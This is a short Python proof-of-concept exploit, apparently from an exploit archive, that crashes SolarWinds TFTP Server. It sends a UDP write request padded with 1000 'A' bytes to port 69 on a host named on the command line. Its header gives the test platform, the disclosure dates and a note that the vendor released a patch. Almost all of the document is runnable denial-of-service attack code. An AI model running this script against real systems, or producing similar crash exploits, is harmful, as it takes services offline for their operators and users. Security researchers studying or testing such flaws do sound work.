Solarwinds DOS

print "\n############################################################"
print "##   Nullthreat Network"
print "##   Solarwinds TFTP Server Ver."
print "##   Elliott \"Nullthreat\" Cutright"
print "##"
print "############################################################"
print "\n"
# Summary: An long Write Request (1000 A's) will cause SolarWinds TFTP Server to crash.
# Tested on: Windows XP SP3
# Usage: ./ <IPADDRESS>
# Note: It can take the application a few moments to crash, be patiant.
# Shouts: #SEUnited, Corelan Team
# Discovered: June 6th 2010
# Vendor Notified: June 9th 2010
# Patch Released: June 11th 2010
import socket
import sys
host = sys.argv[1]
port = 69
addr = (host,port)
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
print "[*] Building Crash"
crash = "\x41" * 1000
request = "\x00\x02" + crash + "\x00" + "NETASCII" + "\x00"
print "[*] Sending Crash"
s.sendto(request, addr)
print "[*] Crash Sent, It can take some time for the app to crash"

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